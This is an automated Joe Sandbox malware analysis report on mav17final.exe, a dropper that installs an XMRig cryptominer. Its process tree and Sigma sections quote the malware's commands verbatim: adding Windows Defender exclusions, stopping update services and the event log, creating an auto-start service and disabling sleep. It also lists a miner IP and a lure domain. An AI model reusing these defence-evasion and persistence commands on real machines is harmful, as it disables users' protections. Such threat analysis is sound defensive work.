Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mav17final.exe

Overview

General Information

Sample name:mav17final.exe
Analysis ID:1445527
MD5:9e77a1c36b7ee264c38b958963769c08
SHA1:eb7ad58040a6dbf826a37d52c26f7ce8ef963342
SHA256:f1836d3e4c6916cdc1f873b430d0a2784885e587683f6917fd51c04eba18933c
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Contains functionality to infect the boot sector
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mav17final.exe (PID: 1968 cmdline: "C:\Users\user\Desktop\mav17final.exe" MD5: 9E77A1C36B7EE264C38B958963769C08)
    • mav17final.exe (PID: 1776 cmdline: "C:\Users\user\Desktop\mav17final.exe" MD5: 9E77A1C36B7EE264C38B958963769C08)
      • cmd.exe (PID: 5840 cmdline: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6160 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5708 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\dialer.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dialer.exe (PID: 3664 cmdline: C:\Users\user\AppData\Local\Temp\dialer.exe MD5: 0BCBEA7313655A42ECC0A1FDBCF37993)
          • powershell.exe (PID: 5084 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1076 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • wusa.exe (PID: 5680 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
          • sc.exe (PID: 6460 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 6536 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 1876 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 6304 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5440 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powercfg.exe (PID: 5940 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powercfg.exe (PID: 3140 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powercfg.exe (PID: 6460 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powercfg.exe (PID: 5664 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
            • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 6192 cmdline: C:\Windows\system32\sc.exe delete "Build" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5960 cmdline: C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 3144 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5160 cmdline: C:\Windows\system32\sc.exe start "Build" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • dialer.exe (PID: 6204 cmdline: C:\ProgramData\dialer.exe MD5: 0BCBEA7313655A42ECC0A1FDBCF37993)
    • powershell.exe (PID: 6108 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5664 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1200 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 5776 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1360 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5948 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5084 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5708 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3620 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4720 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5680 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4440 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dwm.exe (PID: 2804 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
  • svchost.exe (PID: 2076 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0x37eb98:$a1: mining.set_target
    • 0x370e20:$a2: XMRIG_HOSTNAME
    • 0x373748:$a3: Usage: xmrig [OPTIONS]
    • 0x370df8:$a4: XMRIG_VERSION

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    66.2.dwm.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      66.2.dwm.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x37ef98:$a1: mining.set_target
      • 0x371220:$a2: XMRIG_HOSTNAME
      • 0x373b48:$a3: Usage: xmrig [OPTIONS]
      • 0x3711f8:$a4: XMRIG_VERSION
      66.2.dwm.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
      • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
      66.2.dwm.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
      • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
      • 0x3cd180:$s3: \\.\WinRing0_
      • 0x376148:$s4: pool_wallet
      • 0x3705f0:$s5: cryptonight
      • 0x370600:$s5: cryptonight
      • 0x370610:$s5: cryptonight
      • 0x370620:$s5: cryptonight
      • 0x370638:$s5: cryptonight
      • 0x370648:$s5: cryptonight
      • 0x370658:$s5: cryptonight
      • 0x370670:$s5: cryptonight
      • 0x370680:$s5: cryptonight
      • 0x370698:$s5: cryptonight
      • 0x3706b0:$s5: cryptonight
      • 0x3706c0:$s5: cryptonight
      • 0x3706d0:$s5: cryptonight
      • 0x3706e0:$s5: cryptonight
      • 0x3706f8:$s5: cryptonight
      • 0x370710:$s5: cryptonight
      • 0x370720:$s5: cryptonight
      • 0x370730:$s5: cryptonight

      Sigma Signatures

      Change of critical system settings

      barindex
      Sigma detected: Disable power options
      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentImage: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentProcessId: 3664, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5940, ProcessName: powercfg.exe

      System Summary

      barindex
      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mav17final.exe", ParentImage: C:\Users\user\Desktop\mav17final.exe, ParentProcessId: 1776, ParentProcessName: mav17final.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", ProcessId: 5840, ProcessName: cmd.exe
      Sigma detected: Powershell Defender Exclusion
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mav17final.exe", ParentImage: C:\Users\user\Desktop\mav17final.exe, ParentProcessId: 1776, ParentProcessName: mav17final.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", ProcessId: 5840, ProcessName: cmd.exe
      Sigma detected: New Service Creation Using Sc.EXE
      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentImage: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentProcessId: 3664, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto", ProcessId: 5960, ProcessName: sc.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5840, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6160, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 2076, ProcessName: svchost.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Stop EventLog
      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentImage: C:\Users\user\AppData\Local\Temp\dialer.exe, ParentProcessId: 3664, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 3144, ProcessName: sc.exe

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for domain / URL
      Source: gta5modmenufree.comVirustotal: Detection: 5%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\ProgramData\dialer.exeReversingLabs: Detection: 79%
      Source: C:\ProgramData\dialer.exeVirustotal: Detection: 65%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeReversingLabs: Detection: 79%
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeVirustotal: Detection: 65%Perma Link
      Multi AV Scanner detection for submitted file
      Source: mav17final.exeReversingLabs: Detection: 34%
      Source: mav17final.exeVirustotal: Detection: 16%Perma Link
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeJoe Sandbox ML: detected
      Source: C:\ProgramData\dialer.exeJoe Sandbox ML: detected

      Bitcoin Miner

      barindex
      Yara detected Xmrig cryptocurrency miner
      Source: Yara matchFile source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
      Found strings related to Crypto-Mining
      Source: dwm.exeString found in binary or memory: cryptonight-monerov7
      Source: mav17final.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mav17final.exe, 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mav17final.exe, 00000000.00000003.1983941024.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mav17final.exe, 00000000.00000003.1983941024.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073128104.00007FF8B93C8000.00000002.00000001.01000000.00000008.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: mav17final.exe, 00000002.00000002.2068496795.00007FF8A8CEB000.00000002.00000001.01000000.00000004.sdmp
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA487C0 FindFirstFileExW,FindClose,0_2_00007FF79EA487C0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA53A64 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79EA53A64
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA53A64 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79EA53A64
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA5D354 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,0_2_00007FF79EA5D354
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9075AC0 SetErrorMode,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,GetVolumeInformationA,SetLastError,FindFirstVolumeMountPointA,FindNextVolumeMountPointA,FindVolumeMountPointClose,SetErrorMode,FindVolumeMountPointClose,SetErrorMode,2_2_00007FF8B9075AC0
      Source: global trafficTCP traffic: 192.168.2.5:49704 -> 77.105.166.179:7752
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
      Source: unknownTCP traffic detected without corresponding DNS query: 77.105.166.179
